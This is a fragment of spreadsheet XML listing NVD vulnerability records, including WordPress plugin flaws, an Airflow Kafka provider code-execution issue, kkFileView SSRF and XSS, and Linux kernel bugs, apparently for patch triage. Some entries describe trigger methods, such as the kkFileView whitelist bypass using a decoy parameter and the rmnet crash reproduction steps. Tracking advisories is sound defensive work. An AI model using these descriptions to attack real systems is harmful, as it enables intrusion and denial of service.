      <c r="N1517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1517" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1517" s="5" t="inlineStr"/>
      <c r="Q1517" s="5" t="inlineStr"/>
      <c r="R1517" s="5" t="inlineStr">
        <is>
          <t>The Visualizer  WordPress plugin before 4.0.8 does not sanitise and escape a chart's JSON data source configuration before outputting it back in the chart editor, allowing users with the Contributor role and above to store JavaScript that executes in the browser of any higher-privileged user, such as an administrator, who reviews the affected chart.</t>
        </is>
      </c>
      <c r="S1517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86784</t>
        </is>
      </c>
    </row>
    <row r="1518">
      <c r="A1518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86792</t>
        </is>
      </c>
      <c r="D1518" s="5" t="inlineStr"/>
      <c r="E1518" s="5" t="inlineStr"/>
      <c r="F1518" s="5" t="inlineStr"/>
      <c r="G1518" s="5" t="inlineStr"/>
      <c r="H1518" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1518" s="5" t="inlineStr"/>
      <c r="J1518" s="5" t="inlineStr"/>
      <c r="K1518" s="5" t="inlineStr"/>
      <c r="L1518" s="5" t="inlineStr"/>
      <c r="M1518" s="5" t="inlineStr"/>
      <c r="N1518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1518" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1518" s="5" t="inlineStr"/>
      <c r="Q1518" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="R1518" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow Apache Kafka provider versions 1.15.0 before 2.0.0 resolve dotted-path strings found in a Kafka connection's `extra` field into Python callables via `import_string`, with no allowlist, and hand them to the confluent-kafka client which invokes them. Deployments that have enabled the Kafka event producer — `dag_run_events_enabled` or `task_instance_events_enabled`, both disabled by default — build that client inside the scheduler process, so a user whose only privilege is editing Airflow connections gains arbitrary code execution in the control plane; the Airflow security model limits connection-configuration users to code execution on workers, not the scheduler. Deployments using Google Managed Kafka are not affected, because that code path overwrites any user-supplied `oauth_cb`; plain brokers and Amazon MSK are exposed. Users are recommended to upgrade to apache-airflow-providers-apache-kafka 2.0.0 or later, which adds an allowlist configuration option for connection-string callbacks.</t>
        </is>
      </c>
      <c r="S1518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86792</t>
        </is>
      </c>
    </row>
    <row r="1519">
      <c r="A1519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1519" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86823</t>
        </is>
      </c>
      <c r="D1519" s="5" t="inlineStr"/>
      <c r="E1519" s="5" t="inlineStr"/>
      <c r="F1519" s="5" t="inlineStr"/>
      <c r="G1519" s="5" t="inlineStr"/>
      <c r="H1519" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1519" s="5" t="inlineStr"/>
      <c r="J1519" s="5" t="inlineStr"/>
      <c r="K1519" s="5" t="inlineStr"/>
      <c r="L1519" s="5" t="inlineStr"/>
      <c r="M1519" s="5" t="inlineStr"/>
      <c r="N1519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1519" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1519" s="5" t="inlineStr"/>
      <c r="Q1519" s="5" t="inlineStr"/>
      <c r="R1519" s="5" t="inlineStr">
        <is>
          <t>The Newsletter  WordPress plugin before 9.3.7 does not validate the destination of the redirect performed after a public subscription action, allowing unauthenticated attackers to redirect users to arbitrary external sites and to disclose a subscriber token that grants access to that subscriber record's front-end actions.</t>
        </is>
      </c>
      <c r="S1519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86823</t>
        </is>
      </c>
    </row>
    <row r="1520">
      <c r="A1520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1520" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87828</t>
        </is>
      </c>
      <c r="D1520" s="5" t="inlineStr"/>
      <c r="E1520" s="5" t="inlineStr"/>
      <c r="F1520" s="5" t="inlineStr"/>
      <c r="G1520" s="5" t="inlineStr"/>
      <c r="H1520" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1520" s="5" t="inlineStr"/>
      <c r="J1520" s="5" t="inlineStr"/>
      <c r="K1520" s="5" t="inlineStr"/>
      <c r="L1520" s="5" t="inlineStr"/>
      <c r="M1520" s="5" t="inlineStr"/>
      <c r="N1520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1520" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1520" s="5" t="inlineStr"/>
      <c r="Q1520" s="5" t="inlineStr"/>
      <c r="R1520" s="5" t="inlineStr">
        <is>
          <t>The Seraphinite Accelerator WordPress plugin before 2.29.24 does not perform a capability check on one of its state-update AJAX actions, allowing authenticated users such as subscribers to write a malformed value that causes an uncaught error on every subsequent admin page load, making the entire admin area inaccessible to all administrators (denial of service).</t>
        </is>
      </c>
      <c r="S1520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87828</t>
        </is>
      </c>
    </row>
    <row r="1521">
      <c r="A1521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87854</t>
        </is>
      </c>
      <c r="D1521" s="5" t="inlineStr"/>
      <c r="E1521" s="5" t="inlineStr"/>
      <c r="F1521" s="5" t="inlineStr"/>
      <c r="G1521" s="5" t="inlineStr"/>
      <c r="H1521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1521" s="5" t="inlineStr"/>
      <c r="J1521" s="5" t="inlineStr"/>
      <c r="K1521" s="5" t="inlineStr"/>
      <c r="L1521" s="5" t="inlineStr"/>
      <c r="M1521" s="5" t="inlineStr"/>
      <c r="N1521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1521" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1521" s="5" t="inlineStr"/>
      <c r="Q1521" s="5" t="inlineStr"/>
      <c r="R1521" s="5" t="inlineStr">
        <is>
          <t>The Subscriptions for WooCommerce WordPress plugin before 2.0.3 does not correctly validate the shared secret protecting one of its REST endpoints, allowing unauthenticated users to retrieve the store's full list of subscriptions, including customer usernames, product names, recurring amounts and payment dates.</t>
        </is>
      </c>
      <c r="S1521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87854</t>
        </is>
      </c>
    </row>
    <row r="1522">
      <c r="A1522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87860</t>
        </is>
      </c>
      <c r="D1522" s="5" t="inlineStr"/>
      <c r="E1522" s="5" t="inlineStr"/>
      <c r="F1522" s="5" t="inlineStr"/>
      <c r="G1522" s="5" t="inlineStr"/>
      <c r="H1522" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1522" s="5" t="inlineStr"/>
      <c r="J1522" s="5" t="inlineStr"/>
      <c r="K1522" s="5" t="inlineStr"/>
      <c r="L1522" s="5" t="inlineStr"/>
      <c r="M1522" s="5" t="inlineStr"/>
      <c r="N1522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1522" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1522" s="5" t="inlineStr"/>
      <c r="Q1522" s="5" t="inlineStr"/>
      <c r="R1522" s="5" t="inlineStr">
        <is>
          <t>The Subscriptions for WooCommerce WordPress plugin before 2.0.3 does not verify the security token on the request that cancels a subscription, allowing attackers to make a logged-in customer cancel their own active subscription through a crafted request they are tricked into making.</t>
        </is>
      </c>
      <c r="S1522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87860</t>
        </is>
      </c>
    </row>
    <row r="1523">
      <c r="A1523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87896</t>
        </is>
      </c>
      <c r="D1523" s="5" t="inlineStr"/>
      <c r="E1523" s="5" t="inlineStr"/>
      <c r="F1523" s="5" t="inlineStr"/>
      <c r="G1523" s="5" t="inlineStr"/>
      <c r="H1523" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1523" s="5" t="inlineStr"/>
      <c r="J1523" s="5" t="inlineStr"/>
      <c r="K1523" s="5" t="inlineStr"/>
      <c r="L1523" s="5" t="inlineStr"/>
      <c r="M1523" s="5" t="inlineStr"/>
      <c r="N1523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1523" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1523" s="5" t="inlineStr"/>
      <c r="Q1523" s="5" t="inlineStr"/>
      <c r="R1523" s="5" t="inlineStr">
        <is>
          <t>The Rox Appointment Booking  WordPress plugin before 1.2.8 does not perform any authorization check on the endpoint that returns booking agent (staff) records, allowing unauthenticated attackers to read staff email addresses, phone numbers, private internal notes and the linked WordPress account name for every agent.</t>
        </is>
      </c>
      <c r="S1523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87896</t>
        </is>
      </c>
    </row>
    <row r="1524">
      <c r="A1524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87907</t>
        </is>
      </c>
      <c r="D1524" s="5" t="inlineStr"/>
      <c r="E1524" s="5" t="inlineStr"/>
      <c r="F1524" s="5" t="inlineStr"/>
      <c r="G1524" s="5" t="inlineStr"/>
      <c r="H1524" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1524" s="5" t="inlineStr"/>
      <c r="J1524" s="5" t="inlineStr"/>
      <c r="K1524" s="5" t="inlineStr"/>
      <c r="L1524" s="5" t="inlineStr"/>
      <c r="M1524" s="5" t="inlineStr"/>
      <c r="N1524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1524" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1524" s="5" t="inlineStr"/>
      <c r="Q1524" s="5" t="inlineStr"/>
      <c r="R1524" s="5" t="inlineStr">
        <is>
          <t>The Rox Appointment Booking  WordPress plugin before 1.2.8 does not perform any authorization check on the endpoints that return booking service and category records, allowing unauthenticated attackers to read the private internal notes stored on each service and category.</t>
        </is>
      </c>
      <c r="S1524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87907</t>
        </is>
      </c>
    </row>
    <row r="1525">
      <c r="A1525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87959</t>
        </is>
      </c>
      <c r="D1525" s="5" t="inlineStr"/>
      <c r="E1525" s="5" t="inlineStr"/>
      <c r="F1525" s="5" t="inlineStr"/>
      <c r="G1525" s="5" t="inlineStr"/>
      <c r="H1525" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1525" s="5" t="inlineStr"/>
      <c r="J1525" s="5" t="inlineStr"/>
      <c r="K1525" s="5" t="inlineStr"/>
      <c r="L1525" s="5" t="inlineStr"/>
      <c r="M1525" s="5" t="inlineStr"/>
      <c r="N1525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1525" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1525" s="5" t="inlineStr"/>
      <c r="Q1525" s="5" t="inlineStr"/>
      <c r="R1525" s="5" t="inlineStr">
        <is>
          <t>The WPBot  WordPress plugin before 8.7.6 does not perform a capability check on the AJAX action that saves its Claude AI provider settings, allowing users with subscriber-level access to overwrite those settings, including the API key used for the WPBot  WordPress plugin before 8.7.6's outgoing AI requests.</t>
        </is>
      </c>
      <c r="S1525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87959</t>
        </is>
      </c>
    </row>
    <row r="1526">
      <c r="A1526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88592</t>
        </is>
      </c>
      <c r="D1526" s="5" t="inlineStr"/>
      <c r="E1526" s="5" t="inlineStr"/>
      <c r="F1526" s="5" t="inlineStr"/>
      <c r="G1526" s="5" t="inlineStr"/>
      <c r="H1526" s="5" t="inlineStr"/>
      <c r="I1526" s="5" t="inlineStr"/>
      <c r="J1526" s="5" t="inlineStr"/>
      <c r="K1526" s="5" t="inlineStr"/>
      <c r="L1526" s="5" t="inlineStr"/>
      <c r="M1526" s="5" t="inlineStr"/>
      <c r="N1526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1526" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1526" s="5" t="inlineStr"/>
      <c r="Q1526" s="5" t="inlineStr"/>
      <c r="R1526" s="5" t="inlineStr">
        <is>
          <t>kkFileView &gt;= 4.2.0 is vulnerable to Server-Side Request Forgery (SSRF). The cross-origin file proxy endpoint /getCorsFile is protected by TrustHostFilter against the trust.host whitelist. However, the URL parameter validated by the filter is not the same parameter the controller actually fetches: the filter validates the first non-empty parameter in a fixed priority order, while the controller only reads and fetches urlPath. By supplying both urlPath=&lt;real target&gt; and url=&lt;whitelisted decoy address&gt; in the same request, the decoy passes validation while the unvalidated real target is fetched server-side — and the response body is echoed back to the attacker.</t>
        </is>
      </c>
      <c r="S1526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88592</t>
        </is>
      </c>
    </row>
    <row r="1527">
      <c r="A1527" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88593</t>
        </is>
      </c>
      <c r="D1527" s="5" t="inlineStr"/>
      <c r="E1527" s="5" t="inlineStr"/>
      <c r="F1527" s="5" t="inlineStr"/>
      <c r="G1527" s="5" t="inlineStr"/>
      <c r="H1527" s="5" t="inlineStr"/>
      <c r="I1527" s="5" t="inlineStr"/>
      <c r="J1527" s="5" t="inlineStr"/>
      <c r="K1527" s="5" t="inlineStr"/>
      <c r="L1527" s="5" t="inlineStr"/>
      <c r="M1527" s="5" t="inlineStr"/>
      <c r="N1527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1527" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1527" s="5" t="inlineStr"/>
      <c r="Q1527" s="5" t="inlineStr"/>
      <c r="R1527" s="5" t="inlineStr">
        <is>
          <t>kkFileView 5.0.0 through 5.0.2 allows reflected XSS via the /onlinePreview endpoint. The OnlinePreviewController passes the user-controlled page and kkagent request parameters to FreeMarker templates without sanitization, and the templates insert these values into raw JavaScript contexts.</t>
        </is>
      </c>
      <c r="S1527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88593</t>
        </is>
      </c>
    </row>
    <row r="1528">
      <c r="A1528" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88910</t>
        </is>
      </c>
      <c r="D1528" s="5" t="inlineStr"/>
      <c r="E1528" s="5" t="inlineStr"/>
      <c r="F1528" s="5" t="inlineStr"/>
      <c r="G1528" s="5" t="inlineStr"/>
      <c r="H1528" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1528" s="5" t="inlineStr"/>
      <c r="J1528" s="5" t="inlineStr"/>
      <c r="K1528" s="5" t="inlineStr"/>
      <c r="L1528" s="5" t="inlineStr"/>
      <c r="M1528" s="5" t="inlineStr"/>
      <c r="N1528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1528" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1528" s="5" t="inlineStr"/>
      <c r="Q1528" s="5" t="inlineStr"/>
      <c r="R1528" s="5" t="inlineStr">
        <is>
          <t>The kboard WordPress plugin before 6.7 does not verify ownership or context before deleting board media, allowing unauthenticated attackers to permanently delete its uploaded media files and their database records by iterating identifiers.</t>
        </is>
      </c>
      <c r="S1528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88910</t>
        </is>
      </c>
    </row>
    <row r="1529">
      <c r="A1529" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89327</t>
        </is>
      </c>
      <c r="D1529" s="5" t="inlineStr"/>
      <c r="E1529" s="5" t="inlineStr"/>
      <c r="F1529" s="5" t="inlineStr"/>
      <c r="G1529" s="5" t="inlineStr"/>
      <c r="H1529" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1529" s="5" t="inlineStr"/>
      <c r="J1529" s="5" t="inlineStr"/>
      <c r="K1529" s="5" t="inlineStr"/>
      <c r="L1529" s="5" t="inlineStr"/>
      <c r="M1529" s="5" t="inlineStr"/>
      <c r="N1529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1529" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1529" s="5" t="inlineStr"/>
      <c r="Q1529" s="5" t="inlineStr"/>
      <c r="R1529" s="5" t="inlineStr">
        <is>
          <t>The FluentBoards  WordPress plugin before 2.0.15 does not verify that a board member submitting a comment is the user the comment is attributed to, allowing any board member to post comments that appear to be authored by another user, including administrators.</t>
        </is>
      </c>
      <c r="S1529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89327</t>
        </is>
      </c>
    </row>
    <row r="1530">
      <c r="A1530" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89328</t>
        </is>
      </c>
      <c r="D1530" s="5" t="inlineStr"/>
      <c r="E1530" s="5" t="inlineStr"/>
      <c r="F1530" s="5" t="inlineStr"/>
      <c r="G1530" s="5" t="inlineStr"/>
      <c r="H1530" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1530" s="5" t="inlineStr"/>
      <c r="J1530" s="5" t="inlineStr"/>
      <c r="K1530" s="5" t="inlineStr"/>
      <c r="L1530" s="5" t="inlineStr"/>
      <c r="M1530" s="5" t="inlineStr"/>
      <c r="N1530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1530" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1530" s="5" t="inlineStr"/>
      <c r="Q1530" s="5" t="inlineStr"/>
      <c r="R1530" s="5" t="inlineStr">
        <is>
          <t>The FluentBoards  WordPress plugin before 2.0.15 does not properly verify that a user holds board-manager privileges before performing several board-management operations, checking only board membership. This allows any member of a board to carry out manager-only actions on it, including adding or removing members and enabling public access to a private board.</t>
        </is>
      </c>
      <c r="S1530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89328</t>
        </is>
      </c>
    </row>
    <row r="1531">
      <c r="A1531" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89776</t>
        </is>
      </c>
      <c r="D1531" s="5" t="inlineStr"/>
      <c r="E1531" s="5" t="inlineStr"/>
      <c r="F1531" s="5" t="inlineStr"/>
      <c r="G1531" s="5" t="inlineStr"/>
      <c r="H1531" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1531" s="5" t="inlineStr"/>
      <c r="J1531" s="5" t="inlineStr"/>
      <c r="K1531" s="5" t="inlineStr"/>
      <c r="L1531" s="5" t="inlineStr"/>
      <c r="M1531" s="5" t="inlineStr"/>
      <c r="N1531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1531" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1531" s="5" t="inlineStr"/>
      <c r="Q1531" s="5" t="inlineStr"/>
      <c r="R1531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vxlan: vnifilter: enforce exact length of GROUP/GROUP6 attributes
The VXLAN VNI filter entry policy declares the GROUP/GROUP6 address
attributes as NLA_BINARY with only a maximum length, so validate_nla()
accepts a payload shorter than the address. The GROUP consumer reads it
with nla_get_in_addr(), an unconditional 4-byte load, so a short
attribute over-reads up to 3 bytes of uninitialised slab data, which are
stored into remote_ip and echoed back via RTM_GETTUNNEL, disclosing
kernel memory.
Switch both entries to NLA_POLICY_EXACT_LEN() so the validator rejects
any GROUP/GROUP6 that is not exactly 4 / 16 bytes; a valid address is
always sent at full width.</t>
        </is>
      </c>
      <c r="S1531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89776</t>
        </is>
      </c>
    </row>
    <row r="1532">
      <c r="A1532" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89780</t>
        </is>
      </c>
      <c r="D1532" s="5" t="inlineStr"/>
      <c r="E1532" s="5" t="inlineStr"/>
      <c r="F1532" s="5" t="inlineStr"/>
      <c r="G1532" s="5" t="inlineStr"/>
      <c r="H1532" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1532" s="5" t="inlineStr"/>
      <c r="J1532" s="5" t="inlineStr"/>
      <c r="K1532" s="5" t="inlineStr"/>
      <c r="L1532" s="5" t="inlineStr"/>
      <c r="M1532" s="5" t="inlineStr"/>
      <c r="N1532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1532" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1532" s="5" t="inlineStr"/>
      <c r="Q1532" s="5" t="inlineStr"/>
      <c r="R1532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: qualcomm: rmnet: restore skb-&gt;dev on deaggregated frames
rmnet_map_deaggregate() allocates each sub-frame with alloc_skb() and
leaves skb-&gt;dev NULL. __rmnet_map_ingress_handler() assigns
skb-&gt;dev = ep-&gt;egress_dev only on the data path, but a MAP command frame
is dispatched to rmnet_map_command() before that, so rmnet_map_send_ack()
runs netif_tx_lock(skb-&gt;dev) on a NULL device. An unprivileged user
reaches this by unsharing a user+net namespace, creating an rmnet link
over a tap device with INGRESS_DEAGGREGATION and INGRESS_MAP_COMMANDS,
and writing an aggregated frame carrying a flow-control command to the
tap fd.
Restore the assignment dropped by 378e25357ac7, so every skb leaving
rmnet_map_deaggregate() has a valid device.
  BUG: KASAN: null-ptr-deref in _raw_spin_lock (kernel/locking/spinlock.c:158)
  Write of size 4 at addr 00000000000004b4 by task exploit/144
  Call Trace:
   _raw_spin_lock (kernel/locking/spinlock.c:158)
   netif_tx_lock (net/sched/sch_generic.c:497)
   rmnet_map_command (drivers/net/ethernet/qualcomm/rmnet/rmnet_map_command.c:67)
   rmnet_rx_handler (drivers/net/ethernet/qualcomm/rmnet/rmnet_handlers.c:125)
   __netif_receive_skb_core.constprop.0 (net/core/dev.c:6103)
   ...
   __netif_receive_skb_one_core (net/core/dev.c:6214)
   netif_receive_skb (net/core/dev.c:6474)
   tun_get_user (drivers/net/tun.c:1966)
   tun_chr_write_iter (drivers/net/tun.c:2012)
   vfs_write (fs/read_write.c:687)
   ksys_write (fs/read_write.c:739)
   do_syscall_64 (arch/x86/entry/syscall_64.c:94)
   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:121)
  Kernel panic - not syncing: Fatal exception in interrupt</t>
        </is>
      </c>
      <c r="S1532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89780</t>
        </is>
      </c>
    </row>
    <row r="1533">
      <c r="A1533" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89784</t>
        </is>
      </c>
      <c r="D1533" s="5" t="inlineStr"/>
      <c r="E1533" s="5" t="inlineStr"/>
      <c r="F1533" s="5" t="inlineStr"/>
      <c r="G1533" s="5" t="inlineStr"/>
      <c r="H1533" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1533" s="5" t="inlineStr"/>
      <c r="J1533" s="5" t="inlineStr"/>
      <c r="K1533" s="5" t="inlineStr"/>
      <c r="L1533" s="5" t="inlineStr"/>
      <c r="M1533" s="5" t="inlineStr"/>
      <c r="N1533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1533" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1533" s="5" t="inlineStr"/>
      <c r="Q1533" s="5" t="inlineStr"/>
      <c r="R1533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: check rpc_sockaddr2uaddr() return value in rpcb_register_inet4/6
rpcb_register_inet4() and rpcb_register_inet6() store the result of
rpc_sockaddr2uaddr() into map-&gt;r_addr without checking it for NULL.
rpc_sockaddr2uaddr() returns NULL when its final kstrdup() fails, and
the unchecked NULL is then carried into the synchronous RPCBPROC_SET
encode path: rpcb_register_call() -&gt; rpc_call_sync() -&gt;
rpcb_enc_getaddr() -&gt; encode_rpcb_string(), whose first statement is
strlen(string), dereferencing NULL and oopsing the kernel.
The crash reproduces under failslab on v6.12; with KASAN the NULL
dereference surfaces as a fault on the shadow of address zero:
 Oops: general protection fault, probably for non-canonical address
       0xdffffc0000000000 [#1] PREEMPT SMP KASAN
 RIP: 0010:strlen (lib/string.c:409)
 Call Trace:
  encode_rpcb_string (net/sunrpc/rpcb_clnt.c:890)
  rpcb_enc_getaddr (net/sunrpc/rpcb_clnt.c:910)
  rpcauth_wrap_req_encode (net/sunrpc/auth.c:745)
  call_encode (net/sunrpc/clnt.c:1966)
  __rpc_execute (net/sunrpc/sched.c:952)
  rpc_run_task (net/sunrpc/clnt.c:1243)
  rpc_call_sync (net/sunrpc/clnt.c:1272)
  rpcb_v4_register (net/sunrpc/rpcb_clnt.c:500)
  svc_generic_rpcbind_set
  nfsd_rpcbind_set
  svc_register
  svc_setup_socket
  svc_addsock
  write_ports
  nfsctl_transaction_write
  vfs_write
The crash is reachable when an in-kernel RPC service (nfsd, lockd,
nfs-callback) registers with the local rpcbind under enough memory
pressure for the small GFP_KERNEL kstrdup() in rpc_sockaddr2uaddr() to
fail. The asynchronous getport path already handles this exact failure
mode by returning -ENOMEM; only the two register helpers omit the check.
Mirror that handling: bail out with -ENOMEM when rpc_sockaddr2uaddr()
returns NULL, before the address is fed into the encoder.</t>
